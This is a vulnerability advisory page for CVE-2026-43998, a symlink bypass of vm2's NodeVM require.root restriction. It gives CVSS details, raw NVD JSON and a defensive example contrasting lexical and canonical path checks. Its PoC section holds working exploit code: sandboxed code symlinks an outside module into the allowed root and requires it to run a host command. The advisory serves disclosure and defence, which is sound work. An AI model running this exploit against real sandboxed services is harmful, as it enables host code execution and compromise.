Security Vulnerability Report
CVE-2026-43998 CVSS 8.5 HIGH

CVE-2026-43998

Published: 2026-05-13 18:16:16
Last Modified: 2026-05-14 15:36:55

Description

vm2 is an open source vm/sandbox for Node.js. In 3.10.5, NodeVM's require.root path restriction can be bypassed using filesystem symlinks, allowing sandboxed code to load modules from outside the allowed root directory in host context. Because path validation uses path.resolve() (which does not dereference symlinks) but module loading uses Node's native require() (which does), an attacker can load arbitrary host-realm modules and achieve remote code execution. This vulnerability is fixed in 3.11.0.
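The mismatch the description names, seen from the defender's side in an added example (not vm2's code and not its 3.11.0 fix): a lexical `path.resolve()` containment check next to one that canonicalizes with `fs.realpathSync()` before comparing. The function names and the temporary fixture are constructed for illustration.

```javascript
const fs = require('fs');
const os = require('os');
const path = require('path');

// True when `child` is `root` itself or a path below it (string comparison only).
function isWithin(root, child) {
  const rel = path.relative(root, child);
  return rel === '' || (rel !== '..' && !rel.startsWith('..' + path.sep) && !path.isAbsolute(rel));
}

// Lexical check: path.resolve() normalizes "." and ".." but never touches the
// filesystem, so a symlink inside the root is judged by its own location.
function allowedLexical(root, requested) {
  return isWithin(path.resolve(root), path.resolve(root, requested));
}

// Canonical check: fs.realpathSync() dereferences symlinks first, so the path
// compared is the one a module loader would actually read.
function allowedCanonical(root, requested) {
  let real;
  try {
    real = fs.realpathSync(path.resolve(root, requested));
  } catch (err) {
    return false; // missing file or dangling link: deny
  }
  return isWithin(fs.realpathSync(root), real);
}

// Constructed fixture: an allowed root, a file outside it, and a link between them.
function buildFixture() {
  const base = fs.mkdtempSync(path.join(os.tmpdir(), 'root-check-'));
  const root = path.join(base, 'trusted_folder');
  fs.mkdirSync(root);
  fs.writeFileSync(path.join(root, 'ok.js'), 'module.exports = 1;');
  fs.writeFileSync(path.join(base, 'outside.js'), 'module.exports = 2;');
  fs.symlinkSync(path.join(base, 'outside.js'), path.join(root, 'link.js'));
  return { base, root };
}

function demo() {
  const { base, root } = buildFixture();
  const result = {};
  for (const name of ['ok.js', 'link.js', '../outside.js', 'missing.js']) {
    result[name] = { lexical: allowedLexical(root, name), canonical: allowedCanonical(root, name) };
  }
  fs.rmSync(base, { recursive: true, force: true });
  return result;
}
```

A canonical check only holds if the loader is then handed the same canonical path that was checked; validating one path and loading another leaves a window in which the link can be swapped.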

CVSS Details

CVSS Score: 8.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vm2_project:vm2:3.10.5:*:*:*:*:node.js:*:* - VULNERABLE
vm2 <= 3.10.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
const { NodeVM } = require('vm2');
const fs = require('fs');
const path = require('path');

// 1. Setup a restricted environment
const vm = new NodeVM({
  require: {
    root: "./trusted_folder",
    external: false
  }
});

// 2. Simulate a file outside the root that we want to load
fs.writeFileSync('/tmp/evil_module.js', 'module.exports = () => { console.log("RCE!"); require("child_process").exec("calc"); }');

// 3. Malicious code running inside the sandbox
const maliciousCode = `
  const fs = require('fs');
  // Create a symlink inside the allowed root pointing to the external file
  // path.resolve checks the symlink path (valid), require resolves the target (invalid)
  fs.symlinkSync('/tmp/evil_module.js', './trusted_folder/link_to_evil.js');
  // Require the symlink. vm2 validates './trusted_folder/link_to_evil.js' (OK)
  // Node.js require loads '/tmp/evil_module.js' (Bypass!)
  const evil = require('./trusted_folder/link_to_evil.js');
  evil();
`;

vm.run(maliciousCode);

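References

https://github.com/patriksimek/vm2/security/advisories/GHSA-cp6g-6699-wx9c (Exploit, Mitigation, Vendor Advisory)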

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43998", "sourceIdentifier": "[email protected]", "published": "2026-05-13T18:16:16.317", "lastModified": "2026-05-14T15:36:55.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. In 3.10.5, NodeVM's require.root path restriction can be bypassed using filesystem symlinks, allowing sandboxed code to load modules from outside the allowed root directory in host context. Because path validation uses path.resolve() (which does not dereference symlinks) but module loading uses Node's native require() (which does), an attacker can load arbitrary host-realm modules and achieve remote code execution. This vulnerability is fixed in 3.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:3.10.5:*:*:*:*:node.js:*:*", "matchCriteriaId": "C6CF5783-8EBF-4BF6-B816-055195F260E3"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cp6g-6699-wx9c", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cp6g-6699-wx9c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}